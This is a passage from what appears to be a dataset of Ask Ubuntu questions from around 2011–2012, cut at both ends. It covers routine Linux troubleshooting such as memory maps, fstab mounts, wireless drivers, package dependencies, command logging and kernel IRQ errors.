/lib/libpthread-2.7.so b754a000-b754c000 rw-p b754a000 00:00 0 b754c000-b754e000 r-xp 00000000 08:01 7947619 /lib/libutil-2.7.so b754e000-b754f000 r -- p 00001000 08:01 7947619 /lib/libutil-2.7.so b754f000-b7550000 rw-p 00002000 08:01 7947619 /lib/libutil-2.7.so b7550000-b761c000 r-xp 00000000 08:01 8512901 /usr/lib/libpurple.so.0.5.2 b761c000-b7621000 rw-p 000cb000 08:01 8512901 /usr/lib/libpurple.so.0.5.2 b7621000-b7624000 rw-p b7621000 00:00 0 b7624000-b76ef000 r-xp 00000000 08:01 10312819 /usr/lib/libglib-2.0.so.0.1600.6 b76ef000-b76f0000 rw-p 000cb000 08:01 10312819 /usr/lib/libglib-2.0.so.0.1600.6 b76f0000-b76f1000 rw-p b76f0000 00:00 0 b76f1000-b76f3000 r-xp 00000000 08:01 7947649 /lib/libdl-2.7.so b76f3000-b76f4000 r -- p 00001000 08:01 7947649 /lib/libdl-2.7.so b76f4000-b76f5000 rw-p 00002000 08:01 7947649 /lib/libdl-2.7.so b76f5000-b76f7000 r-xp 00000000 08:01 10312821 /usr/lib/libgmodule-2.0.so.0.1600.6 b76f7000-b76f8000 rw-p 00002000 08:01 10312821 /usr/lib/libgmodule-2.0.so.0.1600.6 b76f8000-b7731000 r-xp 00000000 08:01 10312824 /usr/lib/libgobject-2.0.so.0.1600.6 b7731000-b7732000 rw-p 00039000 08:01 10312824 /usr/lib/libgobject-2.0.so.0.1600.6 b7732000-b7790000 r-xp 00000000 08:01 8512997 /usr/lib/libcairo.so.2.17.5 b7790000-b7792000 rw-p 0005e000 08:01 8512997 /usr/lib/libcairo.so.2.17.5 b7792000-b77cc000 r-xp 00000000 08:01 8512894 /usr/lib/libpango-1.0.so.0.2002.3 b77cc000-b77ce000 rw-p 00039000 08:01 8512894 /usr/lib/libpango-1.0.so.0.2002.3 b77ce000-b77d6000 r-xp 00000000 08:01 8512893 /usr/lib/libpangocairo-1.0.so.0.2002.3 b77d6000-b77d7000 rw-p 00008000 08:01 8512893 /usr/lib/libpangocairo-1.0.so.0.2002.3 b77d7000-b77d8000 rw-p b77d7000 00:00 0 b77d8000-b77ee000 r-xp 00000000 08:01 8511815 /usr/lib/libgdk_pixbuf-2.0.so.0.1200.12 b77ee000-b77ef000 rw-p 00016000 08:01 8511815 /usr/lib/libgdk_pixbuf-2.0.so.0.1200.12 b77ef000-b7806000 r-xp 00000000 08:01 8511632 /usr/lib/libatk-1.0.so.0.2314.1 b7806000-b7808000 rw-p 00017000 08:01 8511632 /usr/lib/libatk-1.0.so.0.2314.1 b7808000-b7887000 r-xp 00000000 08:01 8511814 /usr/lib/libgdk-x11-2.0.so.0.1200.12 b7887000-b788a000 rw-p 0007f000 08:01 8511814 /usr/lib/libgdk-x11-2.0.so.0.1200.12 b788a000-b7be9000 r-xp 00000000 08:01 8511810 /usr/lib/libgtk-x11-2.0.so.0.1200.12 b7be9000-b7bef000 rw-p 0035f000 08:01 8511810 /usr/lib/libgtk-x11-2.0.so.0.1200.12 b7bef000-b7bf0000 rw-p b7bef000 00:00 0 b7bf0000-b7d05000 r-xp 00000000 08:01 8512800 /usr/lib/libxml2.so.2.6.32 b7d05000-b7d0a000 rw-p 00115000 08:01 8512800 /usr/lib/libxml2.so.2.6.32 b7d0a000-b7d0c000 rw-p b7d0a000 00:00 0 b7d0c000-b7d13000 r-xp 00000000 08:01 8512271 /usr/lib/libstartup-notification-1.so.0.0.0 b7d13000-b7d14000 rw-p 00006000 08:01 8512271 /usr/lib/libstartup-notification-1.so.0.0.0 b7d14000-b7d19000 r-xp 00000000 08:01 8512183 /usr/lib/libgtkspell.so.0.0.0 b7d19000-b7d1a000 rw-p 00004000 08:01 8512183 /usr/lib/libgtkspell.so.0.0.0 b7d1a000-b7d2e000 r-xp 00000000 08:01 8512527 /usr/lib/libice.so.6.3.0 b7d2e000-b7d30000 rw-p 00013000 08:01 8512527 /usr/lib/libice.so.6.3.0 b7d30000-b7d31000 rw-p b7d30000 00:00 0 b7d31000-b7d38000 r-xp 00000000 08:01 8512531 /usr/lib/libsm.so.6.0.0 b7d38000-b7d39000 rw-p 00006000 08:01 8512531 /usr/lib/libsm.so.6.0.0 b7d39000-b7d3b000 r-xp 00000000 08:01 8512543 /usr/lib/libxss.so.1.0.0 b7d3b000-b7d3c000 rw-p 00001000 08:01 8512543 /usr/lib/libxss.so.1.0.0 b7d3c000-b7d49000 r-xp 00000000 08:01 8512590 /usr/lib/libxext.so.6.4.0 b7d49000-b7d4a000 rw-p 0000c000 08:01 8512590 /usr/lib/libxext.so.6.4.0 b7d4a000-b7d4b000 rw-p b7d4a000 00:00 0 b7d4b000-b7e2e000 r-xp 00000000 08:01 8512367 /usr/lib/libx11.so.6.2.0 b7e2e000-b7e31000 rw-p 000e3000 08:01 8512367 /usr/lib/libx11.so.6.2.0 b7e31000-b7e32000 rw-p b7e31000 00:00 0 b7e32000-b7e39000 r-xp 00000000 08:01 7947618 /lib/librt-2.7.so b7e39000-b7e3a000 r -- p 00006000 08:01 7947618 /lib/librt-2.7.so b7e3a000-b7e3b000 rw-p 00007000 08:01 7947618 /lib/librt-2.7.so b7e3b000-b7e3e000 r-xp 00000000 08:01 10312823 /usr/lib/libgthread-2.0.so.0.1600.6 b7e3e000-b7e3f000 rw-p 00003000 08:01 10312823 /usr/lib/libgthread-2.0.so.0.1600.6 b7e3f000-b7ebd000 r-xp 00000000 08:01 8511645 /usr/lib/libgstreamer-0.10.so.0.18.0 b7ebd000-b7ec1000 rw-p 0007e000 08:01 8511645 /usr/lib/libgstreamer-0.10.so.0.18.0 b7ec1000-b7ef6000 r-xp 00000000 08:01 10307057 /usr/lib/libdbus-1.so.3.4.0 b7ef6000-b7ef7000 r -- p 00034000 08:01 10307057 /usr/lib/libdbus-1.so.3.4.0 b7ef7000-b7ef8000 rw-p 00035000 08:01 10307057 /usr/lib/libdbus-1.so.3.4.0 b7ef8000-b7f13000 r-xp 00000000 08:01 10307072 /usr/lib/libdbus-glib-1.so.2.1.0 b7f13000-b7f14000 rw-p 0001b000 08:01 10307072 /usr/lib/libdbus-glib-1.so.2.1.0 b7f14000-b7f15000 rw-p b7f14000 00:00 0 b7f15000-b7f16000 r-xp 00000000 08:01 10913373 /usr/lib/pidgin/iconaway.so b7f16000-b7f17000 rw-p 00000000 08:01 10913373 /usr/lib/pidgin/iconaway.so b7f17000-b7f19000 r-xp 00000000 08:01 10913358 /usr/lib/pidgin/timestamp.so b7f19000-b7f1a000 rw-p 00001000 08:01 10913358 /usr/lib/pidgin/timestamp.so b7f1a000-b7f1c000 r-xp 00000000 08:01 10913359 /usr/lib/pidgin/history.so b7f1c000-b7f1d000 rw-p 00001000 08:01 10913359 /usr/lib/pidgin/history.so b7f1d000-b7f1e000 r-xp 00000000 08:01 10315686 /usr/lib/gconv/iso8859-1.so b7f1e000-b7f1f000 r -- p 00000000 08:01 10315686 /usr/lib/gconv/iso8859-1.so b7f1f000-b7f20000 rw-p 00001000 08:01 10315686 /usr/lib/gconv/iso8859-1.so b7f20000-b7f21000 r -- p 00000000 08:01 10642878 /usr/lib/locale/en_us/lc_numeric b7f21000-b7f22000 r -- p 00000000 08:01 10651074 /usr/lib/locale/en_us/lc_time b7f22000-b7f23000 r -- p 00000000 08:01 10651075 /usr/lib/locale/en_us/lc_monetary b7f23000-b7f24000 r -- p 00000000 08:01 10660548 /usr/lib/locale/en_us/lc_messages/sys_lc_messages b7f24000-b7f25000 r -- p 00000000 08:01 10651184 /usr/lib/locale/en_us/lc_paper b7f25000-b7f26000 r -- p 00000000 08:01 10651181 /usr/lib/locale/en_us/lc_name b7f26000-b7f27000 r -- p 00000000 08:01 10651073 /usr/lib/locale/en_us/lc_address b7f27000-b7f28000 r -- p 00000000 08:01 10651182 /usr/lib/locale/en_us/lc_telephone b7f28000-b7f29000 r -- p 00000000 08:01 10651185 /usr/lib/locale/en_us/lc_measurement b7f29000-b7f2a000 r -- p 00000000 08:01 10651080 /usr/lib/locale/en_us/lc_identification b7f2a000-b7f2b000 r-xp b7f2a000 00:00 0 [ vdso ] b7f2b000-b7f47000 r-xp 00000000 08:01 7947672 /lib/ld-2.7.so b7f47000-b7f48000 r -- p 0001b000 08:01 7947672 /lib/ld-2.7.so b7f48000-b7f49000 rw-p 0001c000 08:01 7947672 /lib/ld-2.7.so bfc32000-bfc47000 rwxp bffea000 00:00 0 [ stack ] bfc47000-bfc48000 rw-p bffff000 00:00 0 this is the output of cat /proc/pid/maps where pid is the process id for pidgin process . here i can see the address range of stack , heap . but what is vdso and what are other lines for ?
93513	mhddfs mount in /etc/fstab fails if periodic fsck kicks in ... how to solve ?	( ubuntu oneiric 11.10 server ) here is my /etc/fstab # /etc/fstab : static file system information . proc /proc proc nodev , noexec , nosuid 0 0 uuid=4e455083-9ac0-4076-ab25-dedcf461a578 / ext4 noatime , errors=remount-ro 0 1 uuid=9e691b30-8f85-4566-86cd-587de6571ce8 /storage/hdd/sam-1500-1 ext4 defaults 0 2 uuid=1888e5df-2fe5-4760-a271-09676504e168 /storage/hdd/sam-2000-1 ext4 defaults 0 2 uuid=dc321a2e-8266-42de-9b79-7a1b33eacf6c /storage/hdd/sea-1000-1 ext4 defaults 0 2 uuid=987ef5ec-01d2-4542-8e69-a38bed12ddfa /storage/hdd/sea-1000-2 ext4 defaults 0 2 mhddfs # /storage/hdd/sam-2000-1/medias , /storage/hdd/sam-1500-1/medias , /storage/hdd/sea-1000-1/medias , /storage/hdd/sea-1000-2/medias /storage/bigdata/medias fuse defaults , allow_other , nofail 0 0 if the periodic fsck run starts during boot , my mhddfs mount fails and the server waits for a ctrl+d to continue boot ... how can i prevent the `` hang '' while keeping my periodic fsck runs ?
93514	what is best hard disk configuration for ubuntu 11.10 ?	i have an old dell optiplex 260 , built in graphic , lan & sound . with pentium 4 ( 2.80ghz ) , 1gb ram and 80gb hard disk . can i install ubuntu 11.10 on it ? i 'm dying to check it out first before i change it in my regular work laptop . please tell me how to create partition and in which size for best results ?
93518	grafic interface on linux 2.4.24	i 've a machine with linux 2.4.24 installed . how is possible to get a grafic inteface on it ? it is a via ple133 chipset based and it was used in the past as router/firewall . could someone let me know if it is possible to get a grafic interface for such os ? thanks luca
93522	why do i have poor video capture quality , and how can i improve it ?	i have a dual boot lenovo ideapad u260 . if i use skype or a google+ hangout from ubuntu , the video quality is a bit poor . i ca n't adjust the brightness either . but if i boot to windows , the video quality is better . any suggestions for the applications that i can try to improve it ?
93525	volume control does n't work for headphones	fresh install of 11.10 and the gnome panel 's volume control does n't work for headphones but does work for speakers on my laptop . in sound settings i have internal audio analogue stereo selected for output ( output tab ) and analogue speakers selected for connector . when i plug headphones in , the volume control does n't work and the volume is maximum through the headphones . on a side note , only one of my two headphone sockets produces sound too ( whereas both worked in 10.04 )
93530	how to browse a linux network	i have three pcs running ubuntu . now i want to browse one pc from another one . why does ubuntu only show windows network ? i do n't use windows so i have no need for that nor for samba . where are my other ubuntu pcs in my network ? how to visualize them ?
93532	how to get wifi at my home for an ipod use ?	i have ubuntu at my home with 2 desk tops , 1 is a mac , both are wired to t how can i get wifi at my house to use with an ipod and other things ?
93534	how to remove a repository and all it 's installed programs ?	i have installed programs from the nautilus-actions-extra and it cause a lot of problems so i want to remove this repository and all it 's programs . so how to do that ? ? ?
93539	where will be my grails default installation location ?	i installed grails using this command : sudo apt-get install grails-2.0 it installs and it works fine . now where i can find my installation files ? since i 'm newbie to ubuntu i could n't able to guess where the installation file will be for grails ( and for other installations that are done via sudo commands ) . thanks in advance
93540	ipod touch not mounted	i 'm running ubuntu 11.04 in a dell xps15 . when plugging in the ipod it charges but when trying to mount it i ca n't find it anywhere . i 've done a dmesg | grep usb before plugging the ipod and i ca n't see any errors , but when plugged in i see : [ 2133.483377 ] usb 2-1.6 : new high speed usb device using ehci_hcd and address 4 [ 2133.670208 ] cdc_ether 2-1.6:1.6 : wwan0 : register 'cdc_ether ' at usb-0000:00:1d.0-1.6 , mobile broadband network device , 02:80:37 : ec:02:00 [ 2755.346215 ] usb 3-4 : new high speed usb device using xhci_hcd and address 4 [ 2755.376509 ] usb 3-4 : ep 0x83 - rounding interval to 512 microframes [ 2755.381982 ] usb 3-4 : ep 0x83 - rounding interval to 512 microframes [ 2755.382093 ] usb 3-4 : error : endpoint drop flag = 0 , add flag = 1 , and endpoint is not disabled . [ 2755.394808 ] usb 3-4 : ep 0x83 - rounding interval to 512 microframes [ 2755.394943 ] usb 3-4 : error : endpoint drop flag = 0 , add flag = 1 , and endpoint is not disabled . i do n't have any clue how can i try to make the ipod works because the usb seems to be working fine for other devices ( mice , camera , ... ) any thoughts or guide about what can i do ? edit : if it helps , when doing : lsusb | grep apple i get : bus 003 device 012 : id 05ac:1299 apple , inc .
93542	how to disable shutdown/reboot/suspend/hibernate ?	i have an ubuntu 10.04 lts desktop pc with gnome . how can i fully disable the reboot/shutdown/suspend/hibernate functions in gnome or even with root ? so that the root gives out the `` reboot '' or `` pm-suspend '' command it does n't do anything , and the machine goes on . how can i fully disable these basic `` features '' ?
93554	where can i obtain nightly-builds of libreoffice ?	is there a ppa with nightly builds of libreoffice ? or some another source that i can add to my sources.list such that i can try nightly-builds of libreoffice ? i know about the various ways to get the nightlies manually , but i want that the builds are updated with the sudo apt-get update & & sudo apt-get upgrade commands .
93556	64-bit ubuntu server and xubuntu alternative install cds wo n't install	i recently bought a quad-core gateway computer that is a few years old . i want a minimal installation of ubuntu , so i 'm interested primarily in ubuntu server , though xubuntu is okay too . when i try the ubuntu server 64-bit install cd , i ca n't install ubuntu . whenever i select any menu option ( e.g. , `` install ubuntu server '' ) , the computer restarts . i tried the xubuntu alternative install cd with the same problem . the normal xubuntu install cd works fine , as does a 32-bit ubuntu server cd . however , i want to tweak the installation a bit more than the regular xubuntu install cd allows , i want to use a 64-bit os , and i 'm very curious about why the text-only installation wo n't work . using a flash drive with the usb creator program instead of cds has the exact same result . i 'd try lubuntu or plain ubuntu but i 'm lead to believe the problem is with the 64-bit text-only install , not the particular blend of ubuntu . the md5 hashes for my .iso files are correct . i also have verified that the cds work correctly on my dell laptop , which appears to run everything without issue . i 've tried tweaking some bios settings to see if that might make any difference , but it does n't seem to change anything . i tried a memory test ( see below ) . my ram is good . still , i removed one stick to see if the total amount might make a difference -- - it did not . i tried a few different boot parameters as suggested here . specifically , i tried boot_debug=2 ( which did n't display anything because the system restarted before it could ) and the few ways of disabling acpi ( which also did nothing ) . if there are other boot parameters that are worth trying , let me know . i tried the 64-bit ubuntu server 11.04 cd ( instead of 11.10 as i have been trying ) with the same problem . at the moment i 'm investigating installing with lubi . anyone know what might be going wrong here or what i should do to figure out what is wrong ? alternatively , does anyone know how to install a 64-bit os from a 32-bit livecd ?
93562	how to setup a server as router with traffic shaping	a friend of mine owns a house with 10 rooms which he 's renting out to students . he provides them with internet access . unfortunately , regardless of hes appeals and warnings to the students , they keep downloading illegal files via torrents . he already received 2 warning letters that he 's going to be charged . he now has a extra pc and wants all traffic to the internet to go through this computer . at the same time he 'd like to shape the traffic , and also have the ability to see who the offending students are . neither he or i are any good with ubuntu/linux server stuff , but we do n't mind reading . can anyone point us to what tools we would need to install in ubuntu ( preferably gui tools ) to assist in this matter ? any links to websites containing such info could also be handy , since i could n't find anything myself . ( probably cause i 'm not using correct search terms ) thanks , andre
93566	how to log all bash commands by all users on a server ?	our small company runs an ubuntu server 11.10 , to which a couple of people have ssh access . the actual terminals are sometimes used , too . how can we locally log all bash commands run , along with user and time stamp ? we can assume that no-one is nefarious and actively trying to avoid the logging , but we 'd still prefer the users not to have direct write-access to their log files . simultaneous sessions must be handled correctly .
93571	can not install ia32-libs on a 64 bit ubuntu installation	i am using a 64-bit installation of oneiric . i need to install the ia32-libs package to get some applications ( evince , adobe reader ) to work . for example , adobe reader is giving the following error : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory . however , i am not able to install it since it is showing a dependency on ia32-libs-multiarch , which in turn is showing a dependency on gstreamer0.10-plugins-good : i386 . this in turn depends on few other packages . how can i install these packages safely and still meet all the dependencies .
93572	is there a way to see how many downloads have been made for a folder publicly shared on ubuntu one ?	is there a way to see how many downloads there have been for a public folder ? i 'm sharing something on ubuntu one that i want to be able to track the quantity of downloads .
93574	usb0 ethernet on 10.04.3 server	i am installing ubuntu 10.04.3 on ibm system x3400 m3 which is listed as certified for ubuntu 10.04 . i was unable to configure broadcom netxtreme ii gigabit ethernet driver bnx2 during that point . while troubleshooting for that , i noticed that the ip address i given during install got tied to usb0 . since i am first time coming across usb0 as an ethernet device , i thought of asking here . if i can assign an ip address to a usb port , how i can use it to communicate across network ? or is there any other use of having usb ethernet ?
93578	how do i kill gnome-settings-daemon ?	i 'm trying to kill gnome-settings-daemon as mentioned at https : //wiki.ubuntu.com/hotkeys/troubleshooting so that i can examine keyboard events with xev . however , when i do killall gnome-settings-daemon gnome-session just restarts it again . i 'm on ubuntu 11.10 .
93580	will it be possible to use gtk3.2 's html5 extension in 12.04 ?	does anybody know whether or not it will be possible to use the gtk3.2 's new html5-extension in ubuntu 12.04 ? they announced that gnome3.2 will be included , but will they build the gtk packages with the new html5-extension enabled ? unfortunately thy did not in 11.10 .
93581	wine problems // black meshes and bad performance	iâ´ve installed the latest ubuntu version as dualboot with windows xp and wanted to play a game with wine . so i started the software center , installed it and followed the installation guide at the wine appdb . it starts the launcher without any problems , but then there seems a little problem with the shader . it only shows black meshes instead of the textured ones . according to the terminal output there is a problem with the compressed textures but i dont know any solution for this problem . a little information to my actual hardware : i am using a really bad onboard graphics card but up to now it works with windows . thanks to any kind of help and have a nice weekend .
93587	how can i move a btrfs partition ? ( after resizing it )	is it possible to move a btrfs partition ( after i shrinked it ) ? ( e.g . as described in how can i safely resize ( shrink ) a btrfs partition ? ) i need this to grow the partition before the btrf partition .
93588	macbook pro 8.1 wireless instructions	i have been following some instructions on how to get the wireless card working on my early 2011 mbp running ubuntu 11.10 . these can be found here . i get to the following steps : extract the firmware : $ tar xf ../broadcom-wl-5.100.138.tar.bz2 $ export firmware_install_dir= '' /lib/firmware '' $ sudo ./b43-fwcutter -w `` $ firmware_install_dir '' broadcom-wl-5.100.138/linux/wl_apsta.o $ cd .. and the following error is produced in terminal : sudo ./b43-fwcutter -w â¨ $ firmware_install_dirâ¨ broadcom-wl-5.100.138/linux/wl_apsta.o this file is recognised as : filename : wl_apsta.o version : 666.2 md5 : ***************** extracting b43/lp0initvals14.fw failed to create output directory : no such file or directory what am i missing ? any help would be appreciated as i would like to be able to make my laptop a portable machine running ubuntu . currently , it is a desktop laptop machine ...
93596	mobile broadband in network setting missing	i 'm trying to connect to the internet using mobile broadband network ( 3g ) in ubuntu 11.10 , but the mobile broadband tab ( the one to enable/disable mobile broadband ) in network setting seems to be missing . how should i enable it ?
93597	compiling rtl8192cu wireless driver	i 'm trying to compile rtl8192 chipset driver for edimax nano usb wireless modem . i 've got the source code of driver from here . and do this as root : cd ./driver make the error is : make arch=i386 cross_compile= -c /lib/modules/2.6.32-5-486/build m=/home/r1/wireless_driver_rtl8192cu/rtl8192cu/driver/rtl8192cu_linux_v2.0.1212.20101208 modules make [ 1 ] : entering directory `/lib/modules/2.6.32-5-486/build' make [ 1 ] : *** no rule to make target `modules ' . stop . make [ 1 ] : leaving directory `/lib/modules/2.6.32-5-486/build' make : *** [ modules ] error 2
93601	change screen brightness automatically on ac connection/disconnection	i want to keep the screen brightness at minimum level when its unconnected to power and at maximum level when it 's connected on ubuntu 11.04 it was possible , through this config screen : however on ubuntu 11.10 my power settings looks like this : is it possible to change automatically screen brightness on ubuntu 11.10 when power gets connected or disconnected as it was in ubuntu 11.04 ? thanks .
93602	no bootable device found after install on already non booting toshiba c650	i have a toshiba c650 laptop for a year and i had some problems with corrupted clusters in a partition and i tried to fix it by running chkdsk and change partitions which resulted into a not bootable laptop to windows 7 . that made me decide to install ubuntu ( an excuse ) but still after many installs i get always a no bootable devices found during start up . the installation is flawless but no boot what so ever ... i tried to fix the grub with boot-repair but nothing . how can i see what is wrong ? i suspect that the mbr is completely corrupt , is it true ? please help i do n't know what to do : ( thanks
93603	gnome shell lags heavily when using the notification area in the activities overview	i am using catalyst version 11.12 from amd 's website . i have enabled tear free desktop . when i try to use gnome shell , everything works fine , until i use an app that uses the notification area in the activities overview ( ex : desura ) gnome shell starts to lag heavily and sometimes crash/restart ( shell and windows disappear for 2 seconds then comeback ) . anyone have a fix ?
93608	is running an add on like `` no script '' in firefox needed on a linux system ?	a friend recommended the `` no script '' add on for firefox , however this friend runs a windows system . is running `` no script '' on a linux system really needed ? i 'm running firefox 9 on an ubuntu 11.10 64 bit system . i try to use repository programs only , and am utilizing the firewall .
93610	dual boot mac and existing ubuntu	i know this problem 's thread are available but mine is different . i have two hdd installed . i have already installed ubuntu in /dev/sda1 and running fine . now i install imac in /dev/sba1 and that also running fine . problem is when i need to run mac then i need to select mac hdd as first boot from bios and same when need to boot on ubuntu . i tried to add mac in grub ( from ubuntu ) but it did not work ( latter i find the information that mac does not use mbr technique ) . now i am trying to boot ubuntu from mac hdd . from existing solution in internet they asked to create an empty partition and install ubuntu there . but i can do this . i have already installed ubuntu . how to solve this problem ? i need help . thanks in advance . note : i have installed refit in mac . but does not show anything at start up . my hdd partition table : [ information from mac terminal ] /dev/disk0 # : type name size identifier 0 : fdisk_partition_scheme *74.5 gi disk0 1 : apple_hfs mac 18.3 gi disk0s1 2 : windows_ntfs movies 28.3 gi disk0s2 3 : windows_ntfs any 27.9 gi disk0s3 /dev/disk1 # : type name size identifier 0 : fdisk_partition_scheme *232.9 gi disk1 1 : linux 10.5 gi disk1s3 2 : windows_ntfs windows7 19.5 gi disk1s1 3 : windows_ntfs extra 62.0 gi disk1s5 4 : windows_ntfs entertain 62.0 gi disk1s6 5 : windows_ntfs soft & game 62.0 gi disk1s7 6 : windows_ntfs education 16.9 gi disk1s8 /dev/disk2 # : type name size identifier 0 : apple_partition_scheme *20.0 mi disk2 1 : apple_partition_map 31.5 ki disk2s1 2 : apple_hfs refit 20.0 mi disk2s2 i am not sure what is /dev/disk2 . first two disk ( disk0 and disk1 ) are real .
93611	pci ethernet card causes irq `` nobody cared '' in syslog	i have installed a new pci gigabit ethernet card , yet it is not working well . it works for a few minutes then suddenly stops running . i found logs in /var/log/syslog saying irq 18 : nobody cared ( try booting with the `` irqpoll '' option ) and tried the option . now it takes several hours before the network interface goes down . running ifdown eth0 & & ifup eth0 makes it up again , but it does not look like a permanent solution . below is information that i think seems relevant to this issue : /var/log/syslog jan 6 06:21:51 ubuntu kernel : [ 436.677602 ] irq 18 : nobody cared ( try booting with the `` irqpoll '' option ) jan 6 06:21:51 ubuntu kernel : [ 436.677662 ] pid : 0 , comm : swapper tainted : g c 3.0.0-14-generic-pae # 23-ubuntu jan 6 06:21:51 ubuntu kernel : [ 436.677665 ] call trace : jan 6 06:21:51 ubuntu kernel : [ 436.677672 ] [ < c1542c41 > ] ? printk+0x2d/0x2f jan 6 06:21:51 ubuntu kernel : [ 436.677680 ] [ < c10b3e59 > ] __report_bad_irq+0x29/0xd0 jan 6 06:21:51 ubuntu kernel : [ 436.677691 ] [ < f844c5ae > ] ? rtl8169_interrupt+0xbe/0x210 [ r8169 ] jan 6 06:21:51 ubuntu kernel : [ 436.677696 ] [ < c10b4224 > ] note_interrupt+0x104/0x150 jan 6 06:21:51 ubuntu kernel : [ 436.677701 ] [ < c10b274e > ] handle_irq_event_percpu+0x9e/0x200 jan 6 06:21:51 ubuntu kernel : [ 436.677706 ] [ < c1026ae0 > ] ? msi_set_affinity+0x60/0x70 jan 6 06:21:51 ubuntu kernel : [ 436.677710 ] [ < c12bef7f > ] ? msi_set_mask_bit+0x6f/0x80 jan 6 06:21:51 ubuntu kernel : [ 436.677714 ] [ < c10b28eb > ] handle_irq_event+0x3b/0x60 jan 6 06:21:51 ubuntu kernel : [ 436.677719 ] [ < c10b4960 > ] ? unmask_irq+0x30/0x30 jan 6 06:21:51 ubuntu kernel : [ 436.677723 ] [ < c10b49ae > ] handle_fasteoi_irq+0x4e/0xc0 jan 6 06:21:51 ubuntu kernel : [ 436.677725 ] < irq > [ < c155e352 > ] ? do_irq+0x42/0xc0 jan 6 06:21:51 ubuntu kernel : [ 436.677734 ] [ < c1057360 > ] ? irq_exit+0x60/0xa0 jan 6 06:21:51 ubuntu kernel : [ 436.677737 ] [ < c155e429 > ] ? smp_apic_timer_interrupt+0x59/0x88 jan 6 06:21:51 ubuntu kernel : [ 436.677741 ] [ < c155e1b0 > ] ? common_interrupt+0x30/0x38 jan 6 06:21:51 ubuntu kernel : [ 436.677747 ] [ < c105007b > ] ? default_handler+0x2b/0x70 jan 6 06:21:51 ubuntu kernel : [ 436.677752 ] [ < c12e25e7 > ] ? intel_idle+0xb7/0x110 jan 6 06:21:51 ubuntu kernel : [ 436.677758 ] [ < c14397dd > ] ? cpuidle_idle_call+0x7d/0x240 jan 6 06:21:51 ubuntu kernel : [ 436.677762 ] [ < c1008c7a > ] ? cpu_idle+0x8a/0xc0 jan 6 06:21:51 ubuntu kernel : [ 436.677767 ] [ < c1527355 > ] ? rest_init+0x5d/0x68 jan 6 06:21:51 ubuntu kernel : [ 436.677773 ] [ < c17fa774 > ] ? start_kernel+0x352/0x358 jan 6 06:21:51 ubuntu kernel : [ 436.677777 ] [ < c17fa3b3 > ] ? pass_bootoption.constprop.2+0xe2/0xe2 jan 6 06:21:51 ubuntu kernel : [ 436.677782 ] [ < c17fa0ba > ] ? i386_start_kernel+0xa9/0xaf jan 6 06:21:51 ubuntu kernel : [ 436.677784 ] handlers : jan 6 06:21:51 ubuntu kernel : [ 436.677808 ] [ < f844c4f0 > ] rtl8169_interrupt jan 6 06:21:51 ubuntu kernel : [ 436.677846 ] disabling irq # 18 jan 6 06:25:53 ubuntu kernel : [ 678.228016 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- jan 6 06:25:53 ubuntu kernel : [ 678.228027 ] warning : at /build/buildd/linux-3.0.0/net/sched/sch_generic.c:255 dev_watchdog+0x1e6/0x1f0 ( ) jan 6 06:25:53 ubuntu kernel : [ 678.228031 ] hardware name : ms-7680 jan 6 06:25:53 ubuntu kernel : [ 678.228033 ] netdev watchdog : eth0 ( r8169 ) : transmit queue 0 timed out jan 6 06:25:53 ubuntu kernel : [ 678.228035 ] modules linked in : snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd i915 drm_kms_helper drm i2c_algo_bit mei ( c ) video coretemp soundcore snd_page_alloc shpchp psmouse serio_raw rt3070sta lp parport usb_storage uas r8169 ahci libahci jan 6 06:25:53 ubuntu kernel : [ 678.228065 ] pid : 0 , comm : swapper tainted : g c 3.0.0-14-generic-pae # 23-ubuntu jan 6 06:25:53 ubuntu kernel : [ 678.228068 ] call trace : jan 6 06:25:53 ubuntu kernel : [ 678.228075 ] [ < c1050462 > ] warn_slowpath_common+0x72/0xa0 jan 6 06:25:53 ubuntu kernel : [ 678.228080 ] [ < c147a286 > ] ? dev_watchdog+0x1e6/0x1f0 jan 6 06:25:53 ubuntu kernel : [ 678.228083 ] [ < c147a286 > ] ? dev_watchdog+0x1e6/0x1f0 jan 6 06:25:53 ubuntu kernel : [ 678.228088 ] [ < c1050533 > ] warn_slowpath_fmt+0x33/0x40 jan 6 06:25:53 ubuntu kernel : [ 678.228092 ] [ < c147a286 > ] dev_watchdog+0x1e6/0x1f0 jan 6 06:25:53 ubuntu kernel : [ 678.228098 ] [ < c105d8af > ] call_timer_fn+0x2f/0x110 jan 6 06:25:53 ubuntu kernel : [ 678.228102 ] [ < c147a0a0 > ] ? qdisc_reset+0x40/0x40 jan 6 06:25:53 ubuntu kernel : [ 678.228106 ] [ < c105efab > ] run_timer_softirq+0xeb/0x210 jan 6 06:25:53 ubuntu kernel : [ 678.228109 ] [ < c147a0a0 > ] ? qdisc_reset+0x40/0x40 jan 6 06:25:53 ubuntu kernel : [ 678.228114 ] [ < c1056fb0 > ] ? local_bh_enable_ip+0x90/0x90 jan 6 06:25:53 ubuntu kernel : [ 678.228118 ] [ < c1057031 > ] __do_softirq+0x81/0x1a0 jan 6 06:25:53 ubuntu kernel : [ 678.228122 ] [ < c1056fb0 > ] ? local_bh_enable_ip+0x90/0x90 jan 6 06:25:53 ubuntu kernel : [ 678.228125 ] < irq > [ < c1057376 > ] ? irq_exit+0x76/0xa0 jan 6 06:25:53 ubuntu kernel : [ 678.228132 ] [ < c155e429 > ] ? smp_apic_timer_interrupt+0x59/0x88 jan 6 06:25:53 ubuntu kernel : [ 678.228137 ] [ < c1557299 > ] ? apic_timer_interrupt+0x31/0x38 jan 6 06:25:53 ubuntu kernel : [ 678.228141 ] [ < c105007b > ] ? default_handler+0x2b/0x70 jan 6 06:25:53 ubuntu kernel : [ 678.228147 ] [ < c12e25e7 > ] ? intel_idle+0xb7/0x110 jan 6 06:25:53 ubuntu kernel : [ 678.228153 ] [ < c14397dd > ] ? cpuidle_idle_call+0x7d/0x240 jan 6 06:25:53 ubuntu kernel : [ 678.228157 ] [ < c1008c7a > ] ? cpu_idle+0x8a/0xc0 jan 6 06:25:53 ubuntu kernel : [ 678.228163 ] [ < c1527355 > ] ? rest_init+0x5d/0x68 jan 6 06:25:53 ubuntu kernel : [ 678.228169 ] [ < c17fa774 > ] ? start_kernel+0x352/0x358 jan 6 06:25:53 ubuntu kernel : [ 678.228173 ] [ < c17fa3b3 > ] ? pass_bootoption.constprop.2+0xe2/0xe2 jan 6 06:25:53 ubuntu kernel : [ 678.228177 ] [ < c17fa0ba > ] ? i386_start_kernel+0xa9/0xaf jan 6 06:25:53 ubuntu kernel : [ 678.228180 ] 